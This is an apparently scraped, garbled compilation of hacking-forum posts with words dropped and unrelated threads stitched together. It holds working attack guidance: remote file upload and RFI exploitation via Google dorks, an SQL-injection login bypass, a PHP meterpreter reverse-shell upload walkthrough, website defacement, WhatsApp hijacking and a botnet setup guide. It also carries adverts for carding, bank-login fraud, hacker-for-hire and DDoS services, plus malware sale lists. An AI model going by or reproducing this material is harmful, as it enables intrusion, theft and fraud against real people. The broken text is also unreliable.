mos important thing about this tool that not exploitation framework scanner. 
simple tool for checking web server current functionality stands for standard. 
set standard tests and includes indexing directories testing banner grabbing language detection should obvious robots. 
txt and response testing some servers send for every req stands for error bagging. 
the default config for servers put the server daemon and version and sometimes even the inside error pages. 
web sorrow reqs url random bytes with get and post methods. 
auth looks for login pages with list some the most common login files and dirs. 
don need very big list urls because what else are going name cmsplugins run huge list plugins dirs for cms servers. 
the list bit old searches the responses for interesting strings looks for web services such hosting provider blogging services favicon font inherit important font inherit important fingerprinting font and cms version info font look for generally things people don want you see. 
the list generated form ton robot. 
txt whatever finds should interesting. 
proxy send all http reqs via proxy. 
run all the scans the scanner web sorrow also has false positives checking most requests pretty accurate but not perfect. 
every wordpress site contains file called config. 
many who work closely with wordpress would have already seen this file. 
when install wordpress for the very first time this where enter the database details for the site. 
along with the database details this file also contains many other configuration parameters which can lead much better security your wordpress site. 
change database prefix table prefix secure change security keys. 
salt define auth key put your unique phrase here define secure auth key put your unique phrase here define logged key put your unique phrase here define nonce key put your unique phrase here define auth salt put your unique phrase here define secure auth salt put your unique phrase here define logged salt put your unique phrase here define nonce salt put your unique phrase here disable theme file editor define disallow file edit true disallow users install plugins themes doing updates define disallow file mods true forcing use ftp for all uploads upgrades and plugin installation define method ftpext ftps supported then add the following line the config file define ftp ssl true your webhost server supports sftp you should use the following more secure option instead define method ssh limit the number saved revisions define post revisions disable the post revisioning feature define post revisions false foce ssl admin panel define force ssl login true define force ssl admin true change the autosave interval define autosave interval automated trash define empty trash days disabling trash feature define empty trash days automatic database repair. 
com admin maint repair. 
php define allow repair true enable debug while developing define debug true block external requests define true grant access particular site define accessible hosts rpc. 
com increase php memory define memory limit define memory limit define memory limit error log configuration create file called php error. 
log ini set log errors 'on ini set display errors 'off ini set error log home path domain logs php error. 
log enabling and disabling the cache define cache true define cache false define enable cache true define disable cache true define cache expiration time protect config file use. 
php order allow deny deny from all source chetan soni's blog. 
thnks for share this cntent. 
Nashua Unknown United States Checked socks. 
Ogden United States Checked socks. 
Mesquite United States Checked socks. 
Hastings United States Checked socks. 
Highland United States Checked socks. 
Duffield United States Checked socks. 
Nashville United States Checked socks. 
Wasilla United States Checked socks. 
Ogden Unknown United States Checked socks. 
awesome brother thanks for this. 
thank for sharing thank you very much. 
woah gonna try this out thank your for sharing. 
lets see what this. 
file viewer remote file upload vulnerability file viewer just another remote file upload vulnerability allows you upload. 
jpg files for shell uploading try. 
jpg php shell uploading with extention changing tamper data live http headers dork file viewer for uploader and file viewer for uploader dirk paehl goto google any other search engine and type the dork file viewer for uploader now select site from there vulnerable website's title will something like file viewer for uploader after clicking site you'll get site url like this. 
php now replace view. 
php and you'll get upload options there some sites will ask for name password default password for these websites admin name admin password admin now select your files and upload view your uploaded files goto the view. 
php and check files's directory there now click your file enjoy with ihf. 
this infected well have problem cowboy. 
want know more about this. 
link not working dude. 
thanks share bro thank you. 
thanks for this try later. 
make our system server and accessible from anywhere the world then can make thread our personal files not host website from our system then how apply domain name what our changes frequently can use. 
com anyway solve this problem overwriting this file can make damage the victim's system thanks. 
com icq gmail alpha. 
com fresh first hand fullz visa master amex dis with dob amex dis amex dis full info full info australia switzerland france germany mexico new zealand italy asian cvv all country and many country other master and visa bin fullz rezult user trexies password stroke full name jane. 
require receiver first name and last name receiver address receiver email address payment info mtcn will ready for pick maximum minus after payment please dont ask for any test transfer prices for western union online transfer asia canada france germany italy and nigeria transfer charges payment btc transfer transfer transfer transfer transfer note only time transfer name week you need daily transfers then you must have use more names. 
transfer for first time buyers for build trust and loyal together here before move bigger amount mtcn will ready for pick maximum minus after payment the list transportation high end electronics laptop apple laptop dell laptop toshiba laptop lenovo laptop samsung laptop acer laptop vaio iphone iphone ipad black berry iphone iphone perfums etc transit time from days every days will send shipping tracking payment method btc rules long talk please read rules respect them. 
western union bank logins bank transfers paypal and shipping worldwide western union all transfers are processed immediately payment has been confirmed. 
western union transfer rates transfer transfer transfer transfer transfer transfer transfer information required recipients first and last name recipients address country city recipients zip code bank transfer use clean money for transfer bank hack has been cleaned. 
can transfer money most banks the world. 
transfer any amount depending your bank account. 
provide this service very fast safe and sure manner. 
make online transfer with transfer info what required account number iban swift code routing number sort code bank name name the account holder banks transfer transfer transfer transfer transfer banks for gbp transfer for gbp transfer for gbp transfer for gbp transfer for gbp transfer can transfer all africa and asian banks. 
for any asian and african bank will need specification the bank due difference currencies ask about specific bank you want your country and will give the prices. 
bank login have many bank logins different countries info will include username password email access last login fulls info code profile rules for bank login account access denial time sale delivery login. 
give minutes window check the login live and working bank balance balance balance balance balance bank balance gbp balance gbp balance gbp balance gbp balance gbp always check the balance and login details before selling paypal transfer rates for transfer for transfer for transfer for transfer for transfer paypal accounts verified paypal with balance verified paypal with balance verified paypal with balance email address for paypal password fullz information. 
shipping shipping for electronics. 
laptops tablets and mobile phones all you have send the link the item the website you have chosen buy and charge the item's price. 
interested seeing what this. 
thank for this bro. 
nice thread bro keep. 
guess its time get that free net lol. 
making sense big dude thanks for sharing. 
COLOR GUYS NEW FRESH HTTPs proxy LIST HERE. 
must use free seo tools make your life and website easier i'm sharing list tools that run your browser called bookmarklets favelets that run entirely your web browser perform various website seo promotion tasks. 
these are little scripts that are run your browser with single click and don't require installation extensions addons software completely safe and free use. 
the list has all sorts tools tools including auditing your site and finding seo code and content mistakes finding broken links your page auditing your site's page load speed and mobile issues and making improve pinging your content get indexed faster finding keyword density pages checking for duplicate content and plagarism your content against your content finding social media mentions page quickly identifying which links page are follow and lots more. 
pack LL' block make chunk 'aART' make chunk 'data' struct. 
there any other software like Brutus There are more tools now than there were when Brutus was originally released some tools note include Offering HTTP POP FTP generally nice and easy use. 
Entry Offering HTTP POP FTP commercial and freeware versions. 
codefire wrote just found these another site. 
have what you need chase regions wells fargo contact jabber artillery exploit. 
let see thanks buddy. 
rdp cracker included with user and password list download here. 
thanks for share broda. 
sarfroz wrote bro just want ask one more qusetion that can use putty university unblock websites then meanz that can use socks and socks proxies bypass the web filter. 
this tut this guy show the server with crack root user pass. 
okey but this time this time don't know which user pass using the root main admin linux unix. 
according create your own proxy socks. 
azag wrote hidden content you must reply see linksi present you blackw the worm has lots options very easy configure like rat but with lot more options let you discover you even through its screens font color installation tutorial necessary the worm server can encrypted using the tools available the forum color. 
While not disallow the use sniffers Such Ethereal tcpdump HttpWatch general Any going efforts disallow reverse engineer our system our protocols explore outside the boundaries the ordinary requests made clients WhatsApp. 
free working php script check valid emails and registred with paypal. 
screenshoot download hide valid email checker. 
jeahh very nice one stuff. 
think its supposed match with the phone connection. 
indent sqli binger works with bing and automatically finds sqli vuln sites same server. 
see the demo click hidden content you must reply see links download link click hidden content you must reply see links virus scan link click hidden content you must reply see links indent. 
pass password Your Password for Admin Panel function getIP Tracking down the victim's getenv HTTP CLIENT getenv HTTP CLIENT else getenv HTTP FORWARDED FOR getenv HTTP FORWARDED FOR else getenv REMOTE ADDR getenv REMOTE ADDR else UNKNOWN return That's for the Admin Panel. 
how can one use rooted server and for what purpose. 
code author hackeri date vendor homepage. 
tested windows google dork allinurl raspcalendar powered raspcalendar example. 
raspcalendar admin username 'or' password 'or' login success fully vuln sites demo. 
com calendar admin found hackeri uah crew group united albanian hackers thnx loock ckd legends albania. 
just something compiled quickly. 
i'm also posting bot setup guide soon. 
you want any questions links added the please ask and i'll add them. 
what's bot bot malicious program which has several purposes. 
they are usually told what botnet admin although many the features now are automated. 
what's botnet botnet network infected computers that all connect one area where they are commanded the botnet admin. 
what can bot usual features bot include. 
spreading limewire utorrent etc. 
spreading sends contacts msn aim etc. 
ddos attacking see what's ddos attack spam mailing lists emails often used spread collecting personal information passwords bank details and the like how are bots told what bots are usually commanded through irc channel the user. 
commands are built and the bots listen for them. 
what's irc channel irc stands for internet relay chat. 
it's like group messaging thing although you can also speak people privately. 
use irc you need client like chatzilla xchat mirc. 
you then connect irc server and choose the channel you wish join. 
how get botnet first you will need source code and the programs required compile. 
most bots are programmed but you don't need any programming experience compile your own. 
there usually one file named configs. 
something similar that you have edit that's where you edit the bot names the irc channel and any other necessary information. 
look for bot sources the botnet section here and they'll usually come with some form instructions. 
which bot should use recommend imbot. 
it's pretty simple compile and use i'm sure there are tutorials here for well. 
you can download imbot hidden content you must reply see links clean download it's mine. 
mass spreading bot illegally and stealing information can get you into real trouble you're caught. 
the botnets that are shut down have over bots though and wouldn't expect anyone here reach over. 
you will have make sure your irc server secure and that your bot stays undetected. 
true can make money from this yes potentially. 
you could make the bots visit referral sites download files. 
lot people sell the accounts they've taken from their bots for price cheaper than the original. 
you don't have any this but your botnet grows you will need more money transfer professional irc host. 
how can secure hide botnet offshore hosting first all. 
something country such sweden for example. 
dedicated hosting would best because that way you aren't sharing your hosted server with anyone and you can hold much larger network. 
password your irc channel also recommended. 
sure use bot that undetected whether you have crypt not. 
what most people use botnets for the majority them are used for ddos attacks against websites when there are lot them. 
many people set large botnets just sell their bots though. 
with the rate they spread you could sell large amount bots someone for nice profit with only small amount work done. 
how can spread bot most bots are spread through torrenting websites warez boards. 
lot bots also have auto spread features you could have bots and then gain more through the auto spreading without doing any work all. 
lot people also buy bots off other botnet admins start their botnet off with nice amount. 
what type bot would best java bots seem the most popular right now since lot them are still fully undetectable but you have bear mind that your slave will need java. 
the same with bots coded. 
net your bots will need the. 
some bots may also need missing. 
ocx files opinion the best choice bot would one coded such imbot. 
how much should pay for bot installs good price would cents per bot which works out for. 
some botnet admins may charge you more but don't think it's worth paying much more than that. 
another risk buying from other botnet owners that they still keep the bots themselves well sure find someone trustworthy. 
bear mind that some may not able remove their own. 
how configure bot connect irc server most bots come with some sort instructions text file. 
there are also lot tutorials for different bots here just hidden content you must reply see links the name your bot. 
you can't find anything there usually file named config. 
open that and edit the parts that you're supposed should clear which parts change. 
example server pass channel channelpass needs your info that order. 
easy set everything usually easy configure and compile bot but setting your irc server keeping secure paying for larger off shore hosts managing your bots and staying hidden are not easy tasks for beginners. 
once you've done all several times will easier though with anything. 
there are usually people here who would able help you out you're having any problems with your bots. 
can have botnet without irc yes. 
there are other great bots. 
some can connect php pages read commands some can commanded over msn and other clients and some come with their own clients. 
all the web sites are working fine remove. 
htm from the url and try. 
when add page url which not found the site. 
site wont load properly. 
what say hacked ihf. 
this free hosting site. 
ice fog hackers are hackers unlike other hackers here that request for payment upfront provide you with proof before you make payment payment method bitcoin paypal moneygram able hack almost anything long connected the internet. 
and have branches aroung the globe such canada usa china africa. 
note that event payment after job and you are not satisfied withour job you can request for refund and the money would refunded. 
can hack any smart phone spy even monitor chat messages like watsapp track maybe you want know your spouse cheating you you want know the wereabout your kids can hack social media sites like twitter instagram facebook myspace and provide screen shot prove before payment can hack any email address can hack into websites and edit records for you take down website wecan hack university web servers change student grades can make bank transfers send money your credit cards can perform ddos attack for you servers can poison addresses and listen all activities host you need hacker you should contact email gmail. 
com alex general manager. 
powered disqus and microsoft alex alex heid. 
com watch UNNnLBb PVM feature youtu. 
need hacker senior member icefog hackers. 
professional the areas mentioned below. 
facebook whatsapp emails twitter and instagram hack hacking computer system cloning phones changing dmv records without leaving traces changing school grades without leaving traces retrieving hacked social media accounts credit card hack clearing criminal records clearing bad driving records without leaving traces website hack retrieving hacked social media accounts. 
private investigator like cheating husbands wives and any other. 
activities and many other services. 
catch hacker scammers wire transfer any bank retrieval hacked accounts facebook twitter instagram zoosk match etc. 
bank login phishing emails. 
hacking casino odds hacking games mention few. 
your service you need him. 
need check out for self. 
thank you for this sofar. 
wrote yea you heard correct its leaked not believe take look the link enjoy mike please let see. 
thanks for sharing this link. 
scr file mcafee explains. 
target pays the ransom amount the bitcoin then transferred the user's tox account from where tox takes percent cut and the rest can withdrawn the user. 
how protect yourself from ransomware threat last week introduced you free ransomware decryption and malware removal toolkit that could help you deal with different variants ransomware malware and unlock encrypted files without paying off single penny the cyber crooks. 
keep yourself safe also have excellent article how protect your computer from ransomware malware. 
checking out table width wrote pid dateline hello friends this trick still working dont beleieve look the below trick posted. 
replying see the content hehehe. 
codefire wrote hello everyone. 
now i'm gonna show you how send fake email with any email domain you want here first download the program after downloading the program run and the program looks like this now fill all text field the application note click hide fake email textbox your fake email example admins fbi. 
gov victim textbox your target example blahblah gmail. 
com subject textbox your email subject click the checkbox you want random subject messages textbox your email body message you can use html tag too. 
amount textbox how man messages you want send. 
use own email victim textbox for testing you feel necessary. 
after you fill all textfields then click send email button and wait till you got message like this done. 
your email was successfully sent the target. 
your email will entered the inbox folder tested gmail this how looks you use random email and random subject option click hide credits click hide coded anon aeonhack for theme shout out legion and keluarga besar ifc hope this tutorial could helped you and many people this took while make feedback greatly appreciated. 
thanks for reading tutorial and have nice day attach attach. 
com TEENP NKV DEOS. 
how donwload the file. 
thnks bro thnks bro thnks bro. 
today indian young and old hacker back fire. 
cyber world famous with the name one man army. 
rooted whole server and defaced website. 
com archive notifier url. 
joshi url team mates khaled rpi cker haxar'wow black hat sandeep dabas avinash mohite manish tanwar aghilas pas tahleb image attach config attach code. 
will try any case thank much dear. 
CrazyMouse Wrote Hello Today will show you how find the syntax used Havij any other hacking tool What you need hacking tool will use Havij this exemple but you can use whatever you like HTTPSniffer You can download here Code. 
Let's start Havij has open then run HTTPSniffer click Debug Program and select Havij. 
exe and click Attach and Debug Havij insert your vulnerable link and click Start let run until it's IDLE Check the HTTPSniffer log. 
Yes you just found all the query used Havij inject this website What's the point this Most the time Havij fails inject website cause cannot bypass lot security you can now modify the syntax you get HTTPSniffer succesful inject the website you want hacked This think very nice way learn manual SQL injection and you will have all the exemple you need Thanks Crassus you copy please give CrazyMouse and Crassus credit and credit the website too thank you. 
png step create mysql database mysql database wizard image ibtappgbxjwp. 
png then enter database name. 
hacked click next button image xwquwhv. 
png then enter database username and password. 
user name kiddie password hackme then click create user image ikqo klolcm. 
png when the user created will redirect the page where have set user privileges for this select all and click all privileges and click next image ibqjv odp. 
png step phpmyadmin import the database file into phpmyadmin for this click your database name click import browse. 
sql file now your sql file uploaded image izmdzbqb cht. 
zip web panel via ftp you can use filezilla for uploading image ievbodqhutxpv. 
png step web panel folder inc connection. 
png save and close now all settings are done now try open bot open subdomain username root password toor user and password are set default please change after login. 
png next tutorial will show you how make bot and how spread internet. 
thanks for the post cgheers. 
lets see this works guess. 
thank you man very much. 
botnetservicex botnets sources services. 
botnet malware and other services zeus kins toolkit. 
source pack liphyra loader panel builder crypter dexter pos malware source alina sparks. 
service jackpos panel working exe service tinybanker tinba malware source loader pandemic rig exploit kits exploit hunter sources october pony. 
source panel builder multilocker ransomeware silent winlocker panel exe cracked twitter accounts katrina pos malware internet explorer exploit autoexec all versions pos malware source pack pack carding pos card sniffer dexter. 
alina vskimmer pay method bitcoin icq support email maclini yahoo. 
thanks will try later. 
reply often spelled relpy when rushing. 
sarfroz wrote tell bypass the fortiguard webfiltering. 
also none the proxy softwares are working ulrasurf tor freegate hotspot shield etc brother can install tor browser and hotspot shield and can use free vpn. 
tor browser best for bypass this restrictions. 
you have shell alright the path before public html public html you gonna find file called. 
contact contactemail edit and replace with your email and save. 
now question how reset password cpanel have forget password option don't worry. 
click the control panel login button. 
click the forgotten password link. 
enter your domain name username. 
open email which replace there. 
find msg sent from support targethost. 
click the reset password link. 
enter your new password the new password text box. 
enter your new password the new password again text box. 
click the change password button. 
this will take you completion page. 
click the relogin option. 
this will take you sign page very easy right enjoy credit author. 
agreed with jesus and jesus agreed with god. 
dont really understand the lang the image can you tell. 
looking for way inject hack money into paypal account newly setup transfer another account mine. 
ive scoured the web for adder and generators but they all want surveys money. 
and ive got where can anyone help with this please. 
situation wasnt desperate would asking how. 
codefire wrote routerpwn web routerpwn javascript html. 
want share with private shell cyber army hide. 
php hide reply here view the download link. 
let try this first. 
most people don even know but when they lan wan they could possibly have their entire hard drive shared and not even know. 
thanks for upload will test. 
let see that danke. 
great cant see the download link and will definitely try. 
the download link please. 
wana see download link pls. 
thanks much for the great info that nice. 
you must reply see attachments prince chaddha wrote facebook account reset hijack session day exploit only for attach config attach. 
thank you friend witchcraft. 
thank you very much this awsome. 
can update with builder friends anyway very old version can update newest version regards. 
awsome jumbo pack lol. 
remote file upload vulnerability locate target will use google dork intext shopping cart developed bitwords media type into your google search box and press enter. 
will stated there web design shopping cart developed bitwords media. 
click target bitcart website and enter main page. 
test the site vulnerable change the url. 
php upload images your images will stored the product images uploaded images directory. 
direct yourselves maually right click the image and click copy image url enjoy. 
thanks its working great keep. 
this isn first post. 
have posted the wrong category please let know. 
i've been reading from another hackers forum and i'm trying use android linux distribution and was wondering what there might available for mysql server android nescicary have unix terminal can compile and run the program from the command line. 
below link the site. 
ini adalah posting pertama saya. 
jika saya telah diposting kategori yang salah tolong beritahu saya. 
jadi saya sudah membaca dari forum hacker lain dan saya sedang mencoba untuk menggunakan android sebagai distribusi linux saya dan saya bertanya tanya apa yang mungkin ada tersedia untuk server mysql pada android jika nescicary saya memiliki terminal unix sehingga saya dapat mengkompilasi dan menjalankan program dari baris perintah. 
bawah ini adalah link. 
all we're doing ddos services. 
prices home connection hour website hour government website hour payment btc before you pay will ddos your target website see can take down contact shadow exploit. 
just needing the link. 
why necessary post get links and the only one wanting these links. 
will try and see what will happen next its already error. 
nice good job bro. 
codefire wrote what rfi remote file inclusion remote file inclusion rfi type vulnerability most often found websites. 
allows attacker include remote file usually through script the web server. 
the vulnerability occurs due the use user supplied input without proper validation. 
this can lead something minimal outputting the contents the file but depending the severity list few can lead code execution the web server code execution the client side such javascript which can lead other attacks such cross site scripting xss. 
denial service dos data theft very uncommon vulnerability due excessive patches and updates websites. 
here follow finding vulnerable site using google dorks and checking for vulnerability here provided link for finding vulnerable sites using google dorks for rfi now for testing whether our site vulnerable rfi not will uss the following command suppose our target site. 
for checking our url will become something like diz after executing the command the homepage the google shows then then the website vulnerable this attack does not come then the site not vulnerable rfi. 
exploiting the vulnerability for that you will need upload your shell you will need upload your shell. 
recommend you use locus etc. 
you will need upload any website hosting. 
once you have uploaded your shell your website should look like this. 
now comes adding our shell victims website okay once are the vulnerable page will have replace. 
com and include our own file place its our new link should look like this. 
note the question mark important. 
the site was vulnerable you should now see your shell embedded the webpage. 
you can then you wish with. 
txt may not enough may need use null bytes for execute successfully. 
you receive error from shell. 
uploaded our shell successfully the target site and think you all know that what all you can after uploading shell the site smile thanks for the info bro. 
let see bro and thanks anyway. 
paypal scam with this scam you can get victim logins victim personal information victim credit card victim bank details screentshot download change your email this files login. 
would like learn that. 
cool but why have reply see contents reads tos and others. 
dohour ali wrote guys today give you scam page paypal pro you want download. 
new this cyber world. 
wish learn from you guys. 
really interesting and immense help. 
would suggest check score. 
com see the connection totally hidden. 
need more learn about hiding online identity. 
nighthawkn ras wrote thank you great nic post bro. 
already thinking ways make this work too rubbish mate. 
this just dead links. 
nice and cool tutori. 
really cool thanks for sharing this. 
love the spirit bro. 
wrote thanks bro for sharing hello bro really need shell account. 
looking for controller and programer bank phishing. 
atention always post your contact. 
give the link plz. 
and neccessary hide the content. 
codefire wrote what are the packs exploit packs are distributed via web encrypted bundle tipically signed gzip file and contain additional modules that plug directly into exploit pack. 
thx very much hope the link still work can fix the link start the server upload the content again. 
nice thanks for share. 
nice share keep bro. 
let see can work. 
hello friends long time after came here and thinking write something useful for you guys. 
introduction file upload vulnerability hide uploaded files represent significant risk applications. 
the first step many attacks get some code the system attacked. 
then the attack only needs find way get the code executed. 
using file upload helps the attacker accomplish the first step. 
the consequences unrestricted file upload can vary including complete system takeover overloaded file system database forwarding attacks back end systems and simple defacement. 
depends what the application does with the uploaded file and especially where stored. 
there are really two classes problems here. 
the first with the file metadata like the path and file name. 
these are generally provided the transport such http multi part encoding. 
this data may trick the application into overwriting critical file storing the file bad location. 
you must validate the metadata extremely carefully before using. 
the other class problem with the file size content. 
the range problems here depends entirely what the file used for. 
see the examples below for some ideas about how files might misused. 
protect against this type attack you should analyze everything your application does with files and think carefully about what processing and interpreters are involved. 
file upload vulnerability attacks allow malicious users run their own php code vulnerable website. 
the attacker allowed include his own malicious code the space provided for php programs web page. 
for instance piece vulnerable php code would look like this include page. 
php the code include function above instructs the server retrieve php code payloads from the remote server take uploaded the user and run its code. 
this possible because php allows the user load both remote and local content with the same functions. 
the code sample above does not perform any checks the content the code page variable blindly passes the function. 
because the original piece code appended code. 
php the file would try fetch that php payload. 
file upload attack possible because user input not validated properly well the file upload not sanitized server end the developer. 
enough with intro now see the practical you may understand properly. 
requirement attacker machine using kali linux victim server where php file stored for public. 
using backtrack where have stored small code php. 
vulnerable site create your own code for practice. 
not use this knowledge for illegal purpose. 
store your vulnerable code file var with. 
create your payload msfpayload with. 
now lets start with basic end. 
first you need create reverse tcp payload exploit server through file upload vulnerable site. 
type the following command create payload. 
this payload reverse shell which can call back server. 
choose your payload from list payloads. 
you can see all payloads using command msfpayload enter. 
msfpayload php meterpreter reverse tcp lhost. 
php enter above fileattack. 
php file name used for attack payload file name. 
the above command would create file called fileattack. 
php which the reverse shell payload. 
just plain php script that configured according the lhost and lport parameters. 
see the following image. 
url now backtrack have hosted file upload vulnerable site. 
above image shows that blackhat. 
php the client side page and upload. 
php contain php code for upload file without sanitize. 
uploads folder will store our payload. 
now run the blackhat. 
php file kali linux using following path. 
php enter see the following image for more details. 
now before upload our payload first open that fileattack. 
php payload fie your favorite editor and remove the which contain before. 
php enter see the above image carefully contain. 
the above image have removed. 
now upload the fileattack. 
php the target system. 
wait not run yet. 
first need start the listener shown the next step. 
start listener once the payload uploaded the next thing start our listener which will catch the incoming connection offer. 
start msfconsole and run the following commands. 
type terminal msfconsole enter type msfconsole use exploit multi handler enter now set the payloads and lhost lport. 
now upload your payload site. 
see the above image shows that are going upload our payload from attacker machine. 
see shows have uploaded successfully. 
execute this file here itself browser. 
now run the exploit msfconsole. 
use exploit command run the payload and see the magic. 
have got the shell now check some basic task like pwd command. 
png hope you have learned something move forward. 
guys will see more exciting practicals. 
till that time keep practicing and enjoy hacking. 
wrote iis exploit website hacking windows steps computer right cilck and select add network location click next click next now enther the url vulnerable website and click next for example take this site url click next button now click finish see network location option and click website folder now download the shell after downloading right click file and click extract here now copy the power. 
jpg file and open the web folder vuln website now paste the power. 
jpg file web folder paste complete now open browser and enter the site addres and put power. 
jpg after url for example. 
jpg url not working now click edit file index. 
asp open your deface html file. 
right click and select open with notepad copy all code paste the all code that popup which got after clicking edit index. 
asp and click save now you wil get page which will show that the page defaced you've done now whn will open that website you will got your deface page home reading this cool cool. 
gonna give this try. 
need download this and try. 
this the latest version available. 
thanks bro i'll try use. 
codefire wrote spy your friend whatsapp account whatsapp verifies phone mac address. 
you try change whatsapp will again ask you confirm your phone number. 
you will able change your phone mac address victim mac address you able access his her whatsapp account from your phone. 
install buysbox for rooted device here url for busybox not rooted for unrooted phone here url. 
install android terminal emulator here url. 
use multiple whatsapp account the phone tutorial here how run multiple whatsapp account android phone. 
get victim phone and locate her mac address for android settings about phone status mac address for iphone settings general about address for windows phone settings about more info mac address for blackberry options device device and status info wlan mac. 
spoof mac address tutorial how spoof mac address here update guide url wifi mac address android post xda forum url. 
enter victim phone number your whatsapp verify entering verification code received victim cellphone. 
now you can spy victim whatsapp. 
how you send apk file victim. 
thanks for this ill try out thanks for this ill try. 
ice cream sandwich you should use hidden content you must reply see links because broken. 
hidden content you must reply see links step. 
open 'all apps' your android and choose 'settings'. 
click 'add ipsec psk vpn'. 
now enter 'vpn name. 
the vpn server address 'set vpn server'. 
the secret code 'set ipsec pre shared key'. 
you can find securitykiss psk secret hidden content you must reply see links tab. 
save settings pushing 'menu' button hardware button your device and click 'save'. 
your vpn setting now ready. 
your securitykiss tunnel connection will established. 
tap your new vpn connection. 
enter your user name and password and tap 'connect'. 
this just another scam get people comment will trace your profile your house. 
thanks bro nic one share. 
hacking website using rfi method. 
you don't need for what i'm confused. 
doodle wrote endgam wrote apologize this the wrong section for this. 
codes what you mean codes you mean the invite codes they may not all work. 
good one lets give try. 
faststone capture powerful lightweight yet full featured screen capture tool and screen video recorder. 
allows you easily capture and annotate anything the screen including windows objects menus full screen rectangular freehand fixed regions well scrolling windows web pages. 
also allows you record all screen activities including onscreen changes speech from microphone mouse movements and clicks into highly compressed video files. 
you can choose send captures editor file clipboard printer email word powerpoint document upload them your website. 
editing tools include annotating texts arrowed lines highlights resizing cropping sharpening watermarking applying edge effects and many more. 
other features include image scanning global hotkeys automatic filename generation support for external editors color picker screen magnifier and screen ruler. 
faststone capture saves files bmp gif jpeg pcx png tga tiff and pdf formats. 
features small handy capture panel that provides quick access its capture tools and output options global hotkeys activate screen capturing instantly capture windows objects menus full screen rectangular freehand regions and scrolling windows web pages capture multiple windows and objects including multi level menus record screen activities including onscreen changes speech from microphone mouse movements and clicks into highly compressed video files windows media video format. 
built video editor allows you draw annotations apply zoom effects and cut unwanted sections options specify output destination internal editor clipboard file printer. 
draw annotation objects such texts arrowed lines highlights watermarks rectangles and circles apply effects such drop shadow frame torn edge and fade edge add image caption resize crop rotate sharpen brighten adjust colors. 
undo redo support external editors save bmp gif jpeg pcx png tga tiff and pdf formats acquire images from scanner convert images multi page pdf file send captured images email send captured images word and powerpoint documents send captured images web ftp server screen color picker screen magnifier screen ruler support multiple monitors support touch interface tap swipe pinch run when windows starts optional minimize system tray area small footprint memory and many more. 
blink clean adware spyware blink blink url. 
zip official download link url blink. 
get lifetime license crack this tool. 
coffee license name blink blink key blink axgqc rsmoa gibfh xkotj blink thank you. 
coffee warning this key not working then use old version capture. 
color nice share allways looking for new stuff like that will test and give update soon update first thought avast killed the file. 
but looks more like the folder defect and sure one the both. 
anyway panel could usefull color. 
codefire wrote security vulnerability facebook business manager endpoint allows third party application hack any facebook page with limited permissions and the victim will permanently lose admin access the page. 
com xter videos hacking facebook pagesanother serious vulnerability hacking facebook pagesstatus fixedreward usdproof concept. 
permissions dialog box would look like this manage pages requested please note that this app would able manage your pages post statuses publish photos etc. 
don't worry you can still modify the permissions you have granted other apps. 
what rfi remote file inclusion remote file inclusion rfi type vulnerability most often found websites. 
here follow finding vulnerable site using google dorks and checking for vulnerability here provided link for finding vulnerable sites using google dorks for rfi now for testing whether our site vulnerable rfi not will uss the following command. 
mister illusionist wrote password list containing passwords and most common used password list thanks for downloads post longer allowed here the download download list viewable download list downloadable download list viewable download list downloadable cool bro thax. 
thanx for sharing bro. 
one friend requested crack this shit. 
posting this here coz thought may useful for someone else. 
com files mvgvex rems. 
html virus scan result. 
thanks hope the script works thnks alot for the checker. 
thanx man that's what need. 
hope still works will check out. 
how this even working new added target mode hack individual facebook accounts script hidden facebook chat message sent from one pre made accounts not yours. 
make this work there must xss exploit the instant messenger facebook chat otherwise how could work you have the source code anywhere how know this not backdoor. 
hacker wrote nice share dear bro. 
your awesome and this far the most helpful tutorial i've seen yet. 
although i'm very new. 
want see the content the post. 
dark dungeon wrote want see the content the post. 
the short url has been suspended. 
great tutorial stars man. 
joyjeus wrote let try. 
denial service attack dos attack distributed denial service attack ddos attack attempt make computer network resource unavailable its intended users. 
learn about its symptoms and manifestations methods attack and many more here. 
indent general there are roughly two types dos the network connection firewall may too small handle the number packets. 
the application may require too many resources handle specific requests. 
indent the first type exploited sending too much data for example using botnet. 
the second type more sophisticated. 
the network layer for example the attacker may send huge number requests establish connection tcp syn flood but never completing the handshake. 
this causes the target allocate lot memory stores those connections preparation. 
using syn cookies countermeasure. 
the application layer there are usually some operations that take much more resources than average. 
for example web servers are optimized serve static content and they can this really fast for many people. 
but website may have search function which pretty slow compared static pages. 
this perfectly fine only few people use the search function from time time. 
but attacker can especially target. 
another operation that usually pretty slow are logins because they require number database operations counting the number recently failed logins from the same address counting the number recently failed logins for the username validating username and password checking account ban status. 
indent countermeasure the application may support heavy load mode which disables resource intensive operations. 
famous example this was wikipedia the early days although the high load was caused normal users because sudden popularity. 
isps employ preventive measures like disconnecting throttling systems that produce unusually high volumes traffic stopping packets with the wrong source addresses. 
indent there are several ddos attack tools the internet although the simplest way use botnet. 
thanks for reading tutorial. 
connect with skype iam thegame like facebook page. 
com and join group. 
please need tutorial getting smtp apart from using cracker. 
thank you very much thank you very much. 
let see whether work not. 
wow nice post thanks man. 
lets see how this works. 
lets test and lets see how works wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
codefire wrote sup all sharing the full version burpsuite today. 
burpsuite one the most widely used pentesting tool case web apps. 
don't know how use follow this video youtube pbkzvp xuci. 
com watch feature player embedded pbkzvp xuci video depth burpsuite link download virus scan report img hey thanks ive been interested burpsuite but they give discount wanted use part college tech club but discounts old version not appreciate. 
nwho can help need good mailer. 
thanks bro for the post this helpful tutorial pirateboy wrote hello everyone. 
now i'm gonna show you how send fake email with any email domain you want here first download the program updated version hidden content cannot quoted. 
virustotal after downloading the program run and the program looks like this now fill all text field the application note click view after you fill all textfields then click send email button and wait till you got message box. 
your email will entered the inbox folder tested gmail click hide more proof click hide credits click hide coded anon aeonhack for theme shout out legion and keluarga besar ifc hope this tutorial could helped you and many people this took while make feedback greatly appreciated. 
thanks for reading tutorial and have nice day. 
thanks for sharing this man how use this exploit. 
bond benz wrote rdp cracker included with user and password list download thanks let see. 
thnx for sharing bro let see. 
gloria wrote comment est site peut tre quelqu'un pirater site envoyez moi les mots passe. 
url vais payer premi personne qui peut faire. 
cordialement gloria thnx merci partage. 
but dont understand how word. 
seems not working now thank you for share. 
thanks for reply bro. 
this simple guide read somebody else facebook messages without any effort tha cheers mike wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
hows ths work then come handy has any one got the link this pls. 
guess lets check out. 
thanks for sharing will check out. 
cool thanks for this. 
holy balls this free. 
thank you for share this. 
wow dude this amazing. 
lets see works not its first post reading after joining this fourm. 
pratham wrote reply and copy code dance good thank you. 
thnx don't copy and dump posts otherwise hang hehehe thank you. 
need show thi plpst plz reply. 
